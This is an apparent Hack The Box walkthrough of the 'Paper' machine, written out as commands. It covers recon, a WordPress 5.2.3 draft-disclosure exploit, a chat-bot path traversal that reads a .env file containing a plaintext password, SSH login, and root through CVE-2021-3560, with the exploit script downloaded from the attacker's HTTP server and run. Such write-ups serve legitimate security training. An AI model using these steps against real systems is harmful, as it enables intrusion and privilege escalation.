Paper Machine HTB
└──╼$ nmap -sCV 10.10.11.143
We found three open ports (22, 80 and 443) and a few details, such as the OS being CentOS, but nothing very useful here, so let's look at the website.
There is nothing here either, just a test page, so let's look for other directories on this website with a Gobuster scan.
└──╼$ gobuster dir -u http://10.10.11.143/ -w /usr/share/wordlists/dirb/common.txt
Let's take a look at this manual page.
Again, nothing useful here, so let's try to find something else, such as the website's HTTP response headers.
└──╼ $ curl -IL 10.10.11.143
And finally something useful: we found the HTTP header "X-Backend-Server", which returns the name of the back-end web server (internal/hidden) that sits behind the IP.
So we can edit our /etc/hosts file to map this IP to that hostname, like this:
└──╼ $ echo "10.10.11.143 office.paper" >> /etc/hosts
Now let’s open the website by its Host Name.
And here we are, the hidden page is open now, so let's run another Gobuster scan against this new site.
└──╼$ gobuster dir -u http://office.paper/ -w /usr/share/wordlists/dirb/common.txt
Opening the /wp-admin page, we found a WordPress login page.
Let's scan this WordPress site with WPScan.
└──╼$ wpscan --url office.paper
We found that the WordPress version is 5.2.3.
Searching for an exploit for this version:
└──╼$ searchsploit wordpress 5.2.3
We found the exploit "47690.md",
and when we try it against the website like this:
http://office.paper/?static=1
We got this Secret Registration Subdomain:
http://chat.office.paper/register/8qozr226AhkCHZdyY
Then add the new subdomain to our hosts file "/etc/hosts":
└──╼ $ echo "10.10.11.143 chat.office.paper" >> /etc/hosts
We get a Rocket.Chat registration page when we open it.
Let's go in.
In the general chat we found a bot called "Recyclops", so let's start a direct message with it.
When we type "help", it lists its available commands:
1- What time is it?
2- What new files are in your sale directory?
3- Why did the salesman crossed the road?
4- What's the content of file x in your sales directory?
The two commands that will be useful for us are the second and the fourth questions (the directory listing and the file content).
Trying to list the current directory with the command "recyclops list", we notice that there is a user "dwight" on this machine.
Listing the parent directory with "recyclops list ./../", we found an interesting-looking directory, "hubot".
Inside it there is a file called ".env"; we open it with the command "recyclops file ../hubot/.env"
and we got a password in it: "Queenofblad3s!23".
Now we have the credentials "dwight:Queenofblad3s!23".
So let's try to connect over SSH with these credentials "dwight:Queenofblad3s!23":
└──╼$ ssh dwight@10.10.11.143
And we got the user flag:
└──╼$ cat user.txt
So let's escalate our privileges right now!
We can check the OS version with this command:
└──╼$ uname -a
By searching on Google I found a CVE for it (CVE-2021-3560).
And this is the exploit for this CVE (CVE-2021-3560.py).
Now let's transfer the file from our machine to the target with a Python HTTP server:
└──╼$ python3 -m http.server 8383
And fetch the file from my machine like this:
└──╼$ wget "http://10.10.16.24:8383/CVE-2021-3560.py"
Then run it with Python 3:
└──╼$ python3 CVE-2021-3560.py
And now we own this machine and have the root flag ;)
Congratulations, the machine has been pwned!!